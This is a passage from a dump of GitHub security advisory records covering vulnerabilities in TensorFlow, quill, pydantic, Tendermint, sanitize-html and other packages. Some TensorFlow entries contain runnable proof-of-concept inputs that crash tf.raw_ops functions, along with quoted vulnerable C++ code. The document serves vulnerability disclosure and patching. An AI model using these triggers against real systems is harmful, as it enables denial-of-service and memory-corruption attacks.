'https://github.com/WisdomKwan/ps-visitor/blob/cdfc934a8e4af95aa0473f4b2a4bd091d09faf2f/index.js#23L404'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PSVISITOR-1078544'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T22:31:21Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-4943-9vgg-gr5r,2022-03-22T15:00:36Z,2021-05-10T15:38:12Z,,['CVE-2021-3163'],Cross-site Scripting in quill,"A vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned. + +This CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'quill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3163'}, {'type': 'WEB', 'url': 'https://github.com/quilljs/quill/issues/3273'}, {'type': 'WEB', 'url': 'https://github.com/quilljs/quill/issues/3359'}, {'type': 'WEB', 'url': 'https://github.com/quilljs/quill/issues/3364'}, {'type': 'WEB', 'url': 'https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/quilljs/quill'}, {'type': 'WEB', 'url': 'https://quilljs.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T18:12:32Z', 'nvd_published_at': '2021-04-12T21:15:00Z'}" +1.4.0,GHSA-36vm-xw34-x4pj,2021-05-18T19:48:31Z,2021-05-21T14:25:02Z,,['CVE-2021-29562'],CHECK-fail in `tf.raw_ops.IRFFT`,"### Impact +An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from the implementation of `tf.raw_ops.IRFFT`: + +```python +import tensorflow as tf + +values = [-10.0] * 130 +values[0] = -9.999999999999995 +inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) +inputs = tf.cast(inputs, dtype=tf.complex64) +fft_length = tf.constant([0], shape=[1], dtype=tf.int32) + +tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) +``` + +The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination. + +### Patches +We have patched the issue in GitHub commit [1c56f53be0b722ca657cbc7df461ed676c8642a2](https://github.com/tensorflow/tensorflow/commit/1c56f53be0b722ca657cbc7df461ed676c8642a2). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-36vm-xw34-x4pj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29562'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1c56f53be0b722ca657cbc7df461ed676c8642a2'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:48:31Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4j46-mp85-mv8c,2021-05-18T01:51:52Z,2021-05-18T01:52:24Z,,['CVE-2020-7684'],Path traversal in rollup-plugin-serve,Path traversal in npm package `rollup-plugin-serve` before version 1.0.2. There is no path sanitization in `readFile` operation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rollup-plugin-serve'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7684'}, {'type': 'WEB', 'url': 'https://github.com/thgh/rollup-plugin-serve/commit/3d144f2f47e86fcba34f5a144968da94220e3969'}, {'type': 'WEB', 'url': 'https://github.com/thgh/rollup-plugin-serve/releases/tag/v1.0.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.158745'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T21:12:24Z', 'nvd_published_at': '2020-07-17T08:15:00Z'}" +1.4.0,GHSA-cpcr-74q9-74gp,2022-03-02T21:02:00Z,2021-05-10T15:19:04Z,,['CVE-2021-26074'],Broken Authentication in Atlassian Connect Spring Boot,"Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3. Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only server-to-server JWTs should be accepted, permitting an attacker to send authenticated re-installation events to an app.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.atlassian.connect:atlassian-connect-spring-boot-starter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26074'}, {'type': 'WEB', 'url': 'https://community.developer.atlassian.com/t/action-required-atlassian-connect-vulnerability-allows-bypass-of-app-qsh-verification-via-context-jwts/47072'}, {'type': 'WEB', 'url': 'https://confluence.atlassian.com/pages/viewpage.action?pageId=1051986106'}]","{'cwe_ids': ['CWE-287', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:31:53Z', 'nvd_published_at': '2021-04-16T03:15:00Z'}" +1.4.0,GHSA-crch-j389-5f84,2021-05-17T22:28:10Z,2021-05-21T14:28:15Z,,['CVE-2021-29603'],Heap OOB write in TFLite,"### Impact +A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of [`ArgMin`/`ArgMax`](https://github.com/tensorflow/tensorflow/blob/102b211d892f3abc14f845a72047809b39cc65ab/tensorflow/lite/kernels/arg_min_max.cc#L52-L59): + +```cc +TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); +int j = 0; +for (int i = 0; i < NumDimensions(input); ++i) { + if (i != axis_value) { + output_dims->data[j] = SizeOfDimension(input, i); + ++j; + } +} +``` + +If `axis_value` is not a value between 0 and `NumDimensions(input)`, then the condition in the `if` is never true, so code writes past the last valid element of `output_dims->data`. + +### Patches +We have patched the issue in GitHub commit [c59c37e7b2d563967da813fa50fe20b21f4da683](https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-crch-j389-5f84'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29603'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683'}]","{'cwe_ids': ['CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:28:10Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-rjqq-98f6-6j3r,2022-04-27T19:14:02Z,2021-05-06T16:10:05Z,,['CVE-2021-26539'],Improper Input Validation in sanitize-html,"Apostrophe Technologies sanitize-html before 2.3.1 does not properly handle internationalized domain name (IDN) which could allow an attacker to bypass hostname whitelist validation set by the ""allowedIframeHostnames"" option.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sanitize-html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26539'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/pull/458'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/commit/bdf7836ef8f0e5b21f9a1aab0623ae8fcd09c1da'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4308'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/sanitize-html'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T23:13:26Z', 'nvd_published_at': '2021-02-08T17:15:00Z'}" +1.4.0,GHSA-j7cg-h9v9-6vqp,2023-09-07T22:07:24Z,2021-05-06T17:29:19Z,,['CVE-2020-7708'],Prototype Pollution in irrelon-path and @irrelon/path,"The package irrelon-path before 4.7.0; the package @irrelon/path before 4.7.0 are vulnerable to Prototype Pollution via the set, unSet, pushVal and pullVal functions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'irrelon-path'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@irrelon/path'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7708'}, {'type': 'WEB', 'url': 'https://github.com/Irrelon/irrelon-path/commit/8a126b160c1a854ae511659c111413ad9910ebe3'}, {'type': 'PACKAGE', 'url': 'https://github.com/Irrelon/irrelon-path'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598672'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IRRELONPATH-598673'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:25:03Z', 'nvd_published_at': '2020-08-18T15:15:00Z'}" +1.4.0,GHSA-5jqp-qgf6-3pvh,2021-05-13T18:54:35Z,2021-05-13T20:23:17Z,,['CVE-2021-29510'],"Use of ""infinity"" as an input to datetime and date fields causes infinite loop in pydantic"," +Impact + +Passing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU). +Patches + +Pydantic is be patched with fixes available in the following versions: + + v1.8.2 + v1.7.4 + v1.6.2 + +All these versions are available on pypi, and will be available on conda-forge soon. + +See the changelog for details. +Workarounds + +If you absolutely can't upgrade, you can work around this risk using a validator to catch these values, brief demo: + +from datetime import date +from pydantic import BaseModel, validator + +class DemoModel(BaseModel): + date_of_birth: date + + @validator('date_of_birth', pre=True) + def skip_infinite_values(cls, v): + try: + seconds = float(v) + except (ValueError, TypeError): + return v + else: + if seconds == float('inf'): + return date.max + elif seconds == float('-inf'): + return date.min + else: + return seconds + +Note: this is not an ideal solution (in particular you'll need a slightly different function for datetimes), instead of a hack like this you should upgrade pydantic. + +If you are not using v1.8.x, v1.7.x or v1.6.x and are unable to upgrade to a fixed version of pydantic, please create an issue requesting a back-port, and we will endeavour to release a patch for earlier versions of pydantic. +References + +This was fixed in commit 7e83fdd. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pydantic'}, 'ecosystem_specific': {'affected_functions': ['pydantic.datetime_parse.from_unix_seconds']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pydantic'}, 'ecosystem_specific': {'affected_functions': ['pydantic.datetime_parse.from_unix_seconds']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pydantic'}, 'ecosystem_specific': {'affected_functions': ['pydantic.datetime_parse.from_unix_seconds']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/samuelcolvin/pydantic/security/advisories/GHSA-5jqp-qgf6-3pvh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29510'}, {'type': 'WEB', 'url': 'https://github.com/pydantic/pydantic/commit/1c24f1d74ba95ea985b50bdc001ce96c813229aa'}, {'type': 'WEB', 'url': 'https://github.com/pydantic/pydantic/commit/80e0dd3f752bef145dce12f160d262bb40ec8d47'}, {'type': 'WEB', 'url': 'https://github.com/pydantic/pydantic/commit/bdde15b7b947c94ca00fd6eb92da8db390a13520'}, {'type': 'WEB', 'url': 'https://github.com/samuelcolvin/pydantic/commit/7e83fdd2563ffac081db7ecdf1affa65ef38c468'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S2HT266L6Q7H6ICP7DFGXOGBJHNNKMKB/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UEFWM7DYKD2ZHE7R5YT5EQWJPV4ZKYRB/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UMKAJX4O6IGBBCE32CO2G7PZQCCQSBLV/'}]","{'cwe_ids': ['CWE-835'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T18:54:35Z', 'nvd_published_at': '2021-05-13T19:15:00Z'}" +1.4.0,GHSA-4gw3-8f77-f72c,2021-04-21T17:29:09Z,2021-05-10T18:46:27Z,,['CVE-2020-7760'],Regular expression denial of service in codemirror,"This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2. + The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/*.*?*/)*","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'codemirror'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.58.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7760'}, {'type': 'WEB', 'url': 'https://github.com/codemirror/CodeMirror/commit/55d0333907117c9231ffdf555ae8824705993bbb'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEMARMOTTAWEBJARS-1024450'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1024449'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1024445'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBCODEMIRROR-1024448'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBCOMPONENTS-1024446'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1024447'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CODEMIRROR-1016937'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4789'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/codemirror'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T17:29:09Z', 'nvd_published_at': '2020-10-30T11:15:00Z'}" +1.4.0,GHSA-v24h-pjjv-mcp6,2022-10-06T21:49:52Z,2021-05-27T18:44:09Z,,['CVE-2020-5303'],Denial of service in Tendermint,"### Description + +**Denial of Service 1** + +Tendermint 0.33.2 and earlier does not limit the number of P2P connection requests. For each p2p connection, Tendermint allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. + +Tendermint 0.33.3 (and 0.32.10) limits the total number of P2P incoming connection requests to to `p2p.max_num_inbound_peers + len(p2p.unconditional_peer_ids)`. + +Notes: + +- Tendermint does not rate limit P2P connection requests per IP (an attacker can saturate all the inbound slots); +- Tendermint does not rate limit HTTP(S) requests. If you expose any RPC endpoints to the public, please make sure to put in place some protection (https://www.nginx.com/blog/rate-limiting-nginx/). We may implement this in the future (https://github.com/tendermint/tendermint/issues/1696). + +**Denial of Service 2** + +Tendermint 0.33.2 and earlier does not reclaim `activeID` of a peer after it's removed in `Mempool` reactor. This does not happen all the time. It only happens when a connection fails (for any reason) before the `Peer` is created and added to all reactors. `RemovePeer` is therefore called before `AddPeer`, which leads to always growing memory (`activeIDs` map). The `activeIDs` map has a maximum size of 65535 and the node will panic if this map reaches the maximum. An attacker can create a lot of connection attempts (exploiting Denial of Service 1), which ultimately will lead to the node panicking. + +Tendermint 0.33.3 (and 0.32.10) claims `activeID` for a peer in `InitPeer`, which is executed before `MConnection` is started. + +Notes: + +- `InitPeer` function was added to all reactors to combat a similar issue - https://github.com/tendermint/tendermint/issues/3338; +- Denial of Service 2 is independent of Denial of Service 1 and can be executed without it. + +### Impact + +- All full nodes (except for validators who are behind closed networks) +- Node's memory usage increases, then it panics either in the mempool or due to OOM. + +### Patches + +- v0.33.3 +- v0.32.10 +- v0.31.12 + +### Workarounds + +No workarounds. + +### References + +- https://hackerone.com/reports/820317 (not disclosed yet) +- https://github.com/tendermint/tendermint/issues/3338 +- https://github.com/tendermint/tendermint/issues/1696 + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [tendermint/tendermint](https://github.com/tendermint/tendermint) +* Email us at [security@tendermint.com](mailto:security@tendermint.com) + +More information can be found [here](https://tendermint.com/security/). + +### Credits + +- [fudongbai](https://hackerone.com/fudongbai) for discovering and reporting Denial of Service 2 +- Ethan Buchman (@ebuchman) for writing a test case for Denial of Service 2 and Tess Rinearson (@tessr) for fixing it +- Anton Kaliaev (@melekes) for fixing Denial of Service 1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tendermint/tendermint/p2p'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.33.0'}, {'fixed': '0.33.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/tendermint/tendermint/p2p'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/tendermint/tendermint/p2p'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.32.0'}, {'fixed': '0.32.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/security/advisories/GHSA-v24h-pjjv-mcp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5303'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/issues/1696'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/issues/3338'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/commit/e2d6859afd7dba4cf97c7f7d412e7d8fc908d1cd'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/820317'}, {'type': 'PACKAGE', 'url': 'https://github.com/tendermint/tendermint'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/blob/master/CHANGELOG.md#denial-of-service-1'}]","{'cwe_ids': ['CWE-787', 'CWE-789'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:16:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-v2wx-jj66-2hp7,2021-05-21T17:58:38Z,2021-05-25T18:45:05Z,,['CVE-2021-3536'],Cross-site Scripting in Wildfly,"A flaw was found in Wildfly in versions before 23.0.2.Final while creating a new role in domain mode via the admin console, it is possible to add a payload in the name field, leading to XSS. This affects Confidentiality and Integrity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.wildfly:wildfly-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.0.2.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 23.0.1.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3536'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1948001'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T17:58:38Z', 'nvd_published_at': '2021-05-20T13:15:00Z'}" +1.4.0,GHSA-m3f9-w3p3-p669,2021-05-18T22:38:55Z,2021-05-21T14:22:28Z,,['CVE-2021-29535'],Heap buffer overflow in `QuantizedMul`,"### Impact +An attacker can cause a heap buffer overflow in `QuantizedMul` by passing in invalid thresholds for the quantization: + +```python +import tensorflow as tf + +x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) +y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) +min_x = tf.constant([], dtype=tf.float32) +max_x = tf.constant([], dtype=tf.float32) +min_y = tf.constant([], dtype=tf.float32) +max_y = tf.constant([], dtype=tf.float32) + +tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/87cf4d3ea9949051e50ca3f071fc909538a51cd0/tensorflow/core/kernels/quantized_mul_op.cc#L287-L290) assumes that the 4 arguments are always valid scalars and tries to access the numeric value directly: + +```cc +const float min_x = context->input(2).flat()(0); +const float max_x = context->input(3).flat()(0); +const float min_y = context->input(4).flat()(0); +const float max_y = context->input(5).flat()(0); +``` + +However, if any of these tensors is empty, then `.flat()` is an empty buffer and accessing the element at position 0 results in overflow. + +### Patches +We have patched the issue in GitHub commit [efea03b38fb8d3b81762237dc85e579cc5fc6e87](https://github.com/tensorflow/tensorflow/commit/efea03b38fb8d3b81762237dc85e579cc5fc6e87). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': 